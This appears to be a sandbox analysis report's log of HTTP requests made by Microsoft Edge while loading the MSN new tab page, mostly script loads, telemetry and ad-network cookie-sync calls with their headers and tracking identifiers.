Source: global trafficHTTP traffic detected: GET /bundles/v1/edgeChromium/latest/vendors.5d0f28115e15fcff20c5.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /bundles/v1/edgeChromium/latest/microsoft.4fa8815283fe3d88a934.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /bundles/v1/edgeChromium/latest/common.005fa5d1a45c7a2d7a6d.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /bundles/v1/edgeChromium/latest/experience.712fce86a817d16b2c92.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /resolver/api/resolve/v3/config/?expType=AppConfig&expInstance=default&apptype=edgeChromium&v=20250306.449&targetScope={%22audienceMode%22:%22adult%22,%22browser%22:{%22browserType%22:%22edgeChromium%22,%22version%22:%2294%22,%22ismobile%22:%22false%22},%22deviceFormFactor%22:%22desktop%22,%22domain%22:%22ntp.msn.com%22,%22locale%22:{%22content%22:{%22language%22:%22en%22,%22market%22:%22us%22},%22display%22:{%22language%22:%22en%22,%22market%22:%22us%22}},%22ocid%22:%22MNHP_U531%22,%22os%22:%22windows%22,%22platform%22:%22web%22,%22pageType%22:%22dhp%22,%22pageExperiments%22:[%22prg-c-adspfpv%22,%22prg-hometo-hpmsn%22,%22prg-hp-switchfeed%22,%22prg-update-hide%22]} HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"Device-Memory: 8sec-ch-ua-model: rtt: 300sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "94.0.992.31"sec-ch-ua-platform-version: "10.0.0"downlink: 1.25sec-ch-ua-bitness: "64"ect: 3gsec-ch-prefers-color-scheme: lightsec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/edge/ntp?locale=en-US&title=New%20tab&dsp=1&sp=Bing&startpage=1&PC=U531&OCID=MNHP_U531Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _C_ETH=1; sptmarket=en-US||us|en-us|en-us|en||cf=8|RefA=CE27969BA8D74822BE092FFEAAAF385A.RefC=2025-03-07T16:50:12Z; USRLOC=; MUID=0DDB686F4DAE69E20AF07DC74C2A6898; MUIDB=0DDB686F4DAE69E20AF07DC74C2A6898; _EDGE_S=F=1&SID=09B6721C09FF608E3C5C67B408E461B2; _EDGE_V=1; MicrosoftApplicationsTelemetryDeviceId=a977fbce-5f22-43a4-bd6f-4313a19b6779
Source: global trafficHTTP traffic detected: GET /c.gif?rnd=1741366219690&udc=true&pg.n=default&pg.t=dhp&pg.c=2083&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-US%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26startpage%3D1%26PC%3DU531%26OCID%3DMNHP_U531&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=ce27969ba8d74822be092ffeaaaf385a&activityId=ce27969ba8d74822be092ffeaaaf385a&d.imd=false&scr=1920x1080&anoncknm=app_anon&issso=&aadState=0 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _C_ETH=1; USRLOC=; MUID=0DDB686F4DAE69E20AF07DC74C2A6898; _EDGE_S=F=1&SID=09B6721C09FF608E3C5C67B408E461B2; _EDGE_V=1
Source: global trafficHTTP traffic detected: GET /b?rn=1741366219690&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-US%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26startpage%3D1%26PC%3DU531%26OCID%3DMNHP_U531%26content%3D1%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=0DDB686F4DAE69E20AF07DC74C2A6898&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /b2?rn=1741366219690&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-US%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26startpage%3D1%26PC%3DU531%26OCID%3DMNHP_U531%26content%3D1%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=0DDB686F4DAE69E20AF07DC74C2A6898&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: UID=1C47a50091fdbfff61fd4501741366220
Source: global trafficHTTP traffic detected: GET /c.gif?rnd=1741366219690&udc=true&pg.n=default&pg.t=dhp&pg.c=2083&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-US%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26startpage%3D1%26PC%3DU531%26OCID%3DMNHP_U531&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=ce27969ba8d74822be092ffeaaaf385a&activityId=ce27969ba8d74822be092ffeaaaf385a&d.imd=false&scr=1920x1080&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=7E37932775ED4049B307204B663D93FA&MUID=0DDB686F4DAE69E20AF07DC74C2A6898 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: USRLOC=; MUID=0DDB686F4DAE69E20AF07DC74C2A6898; _EDGE_S=F=1&SID=09B6721C09FF608E3C5C67B408E461B2; _EDGE_V=1; SM=T
Source: global trafficHTTP traffic detected: GET /sg/msn/1/cm?taboola_hm=0DDB686F4DAE69E20AF07DC74C2A6898&gdpr=0&gdpr_consent= HTTP/1.1Host: trc.taboola.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cksync.php?type=nms&cs=3&ovsid=0DDB686F4DAE69E20AF07DC74C2A6898&gdpr=0&gdpr_consent= HTTP/1.1Host: hbx.media.netConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /m?cdsp=516415&c=0DDB686F4DAE69E20AF07DC74C2A6898&mode=inverse&msn_src=ntp&&gdpr=0&gdpr_consent= HTTP/1.1Host: cm.mgid.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /uidmappixel?ext_uid=0DDB686F4DAE69E20AF07DC74C2A6898&pname=MSN&gdpr=0&gdpr_consent= HTTP/1.1Host: sync.outbrain.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /mapuid?suid=0DDB686F4DAE69E20AF07DC74C2A6898&sid=16&gdpr=0&gdpr_consent= HTTP/1.1Host: eb2.3lift.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sync/msn?gdpr=0&gdpr_consent= HTTP/1.1Host: pr-bh.ybp.yahoo.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /setuid?partner=microsoftSsp&dbredirect=true&dnt=0&gdpr=0&gdpr_consent= HTTP/1.1Host: px.ads.linkedin.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true&enableWidgetsRegion=true HTTP/1.1Host: ntp.msn.comConnection: keep-aliveCache-Control: max-age=0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31Accept: */*Service-Worker: scriptSec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: serviceworkerReferer: https://ntp.msn.com/edge/ntp?locale=en-US&title=New%20tab&dsp=1&sp=Bing&startpage=1&PC=U531&OCID=MNHP_U531Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _C_Auth=; pglt-edgeChromium-dhp=2083; sptmarket=en-US||us|en-us|en-us|en||cf=8|RefA=CE27969BA8D74822BE092FFEAAAF385A.RefC=2025-03-07T16:50:12Z; USRLOC=; MUID=0DDB686F4DAE69E20AF07DC74C2A6898; MUIDB=0DDB686F4DAE69E20AF07DC74C2A6898; _EDGE_S=F=1&SID=09B6721C09FF608E3C5C67B408E461B2; _EDGE_V=1; MicrosoftApplicationsTelemetryDeviceId=a977fbce-5f22-43a4-bd6f-4313a19b6779; ai_session=U3AHhvkvWqkroU9hfsRIm7|1741366219682|1741366219682; sptmarket_restored=en-US||us|en-us|en-us|en||cf=8|RefA=CE27969BA8D74822BE092FFEAAAF385A.RefC=2025-03-07T16:50:12Z; _C_ETH=1; msnup=%7B%22cnex%22%3A%22no%22%7D
Source: global trafficHTTP traffic detected: GET /edge/ntp?locale=en-US&title=New+tab&OCID=MNHP_U531&enableForceCache=true HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"Device-Memory: 8sec-ch-ua-model: rtt: 200sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "94.0.992.31"sec-ch-ua-platform-version: "10.0.0"downlink: 3.8sec-ch-ua-bitness: "64"ect: 4gsec-ch-prefers-color-scheme: lightsec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/edge/ntp?locale=en-US&title=New%20tab&dsp=1&sp=Bing&startpage=1&PC=U531&OCID=MNHP_U531Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _C_Auth=; pglt-edgeChromium-dhp=2083; sptmarket=en-US||us|en-us|en-us|en||cf=8|RefA=CE27969BA8D74822BE092FFEAAAF385A.RefC=2025-03-07T16:50:12Z; USRLOC=; MUID=0DDB686F4DAE69E20AF07DC74C2A6898; MUIDB=0DDB686F4DAE69E20AF07DC74C2A6898; _EDGE_S=F=1&SID=09B6721C09FF608E3C5C67B408E461B2; _EDGE_V=1; MicrosoftApplicationsTelemetryDeviceId=a977fbce-5f22-43a4-bd6f-4313a19b6779; ai_session=U3AHhvkvWqkroU9hfsRIm7|1741366219682|1741366219682; sptmarket_restored=en-US||us|en-us|en-us|en||cf=8|RefA=CE27969BA8D74822BE092FFEAAAF385A.RefC=2025-03-07T16:50:12Z; _C_ETH=1; msnup=%7B%22cnex%22%3A%22no%22%7D
Source: global trafficHTTP traffic detected: GET /sync?ssp=msn&id=0DDB686F4DAE69E20AF07DC74C2A6898&gdpr=0&gdpr_consent= HTTP/1.1Host: code.yengo.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /getuid?ld=1&gdpr=0&cmp_cs=&us_privacy= HTTP/1.1Host: eb2.3lift.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /visitor/sync?uid=9871605be8d4b2a982914bf5c9348e7b&name=MSN&visitor=0DDB686F4DAE69E20AF07DC74C2A6898&external=true&gdpr=0&gdpr_consent= HTTP/1.1Host: visitor.omnitagjs.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cs/msn?id=0DDB686F4DAE69E20AF07DC74C2A6898&gdpr=0&gdpr_consent= HTTP/1.1Host: trace.mediago.ioConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /notify/served?rid=ce27969ba8d74822be092ffeaaaf385a&r=river&i=1&p=edgechrntp&l=en-us&d=bing&b=Edg&a=7af2a3f4-e29e-46f6-8bb1-bb526b3dff9b&ii=1&c=13632534912796677099&bid=bef813bc-b568-41df-9b1e-3d66353a0ada&tid=edgechrntp-river-1&ptid=edgechrntp-peekriver-1 HTTP/1.1Host: srtb.msn.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: USRLOC=; MUID=0DDB686F4DAE69E20AF07DC74C2A6898; _EDGE_S=F=1&SID=09B6721C09FF608E3C5C67B408E461B2; _EDGE_V=1; _C_ETH=1; msnup=%7B%22cnex%22%3A%22no%22%7D
Source: global trafficHTTP traffic detected: GET /oRTB?redirect={PubRedirectUrl}&gdpr=0&gdpr_consent= HTTP/1.1Host: sync.inmobi.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /notify/served?rid=ce27969ba8d74822be092ffeaaaf385a&r=resriver&i=1&p=edgechrntp&l=en-us&d=bing&b=Edg&a=0230aa10-aefe-4507-a806-0ed773d001f4&ii=1&c=16708633625282948573&bid=bef813bc-b568-41df-9b1e-3d66353a0ada&tid=edgechrntp-resriver-1&ptid=edgechrntp-resriver-1 HTTP/1.1Host: srtb.msn.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: USRLOC=; MUID=0DDB686F4DAE69E20AF07DC74C2A6898; _EDGE_S=F=1&SID=09B6721C09FF608E3C5C67B408E461B2; _EDGE_V=1; _C_ETH=1; msnup=%7B%22cnex%22%3A%22no%22%7D
Source: global trafficHTTP traffic detected: GET /getuid?https://c.bing.com/c.gif?anx_uid=$UID&Red3=MSAN_pd&gdpr=0&gdpr_consent= HTTP/1.1Host: ib.adnxs.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cs/msn?id=0DDB686F4DAE69E20AF07DC74C2A6898&gdpr=0&gdpr_consent= HTTP/1.1Host: trace.popin.ccConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /mapuid?member=280&user=0DDB686F4DAE69E20AF07DC74C2A6898;&gdpr=0&gdpr_consent=&redir=https%3A%2F%2Fm.adnxs.com%2Fseg%3Fadd%3D5159620%26redir%3Dhttps%253A%252F%252Fib.adnxs.com%252Fsetuid%253Fentity%253D483%2526code%253D0DDB686F4DAE69E20AF07DC74C2A6898%2526gdpr%253D0%2526gdpr_consent%253D HTTP/1.1Host: m.adnxs.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
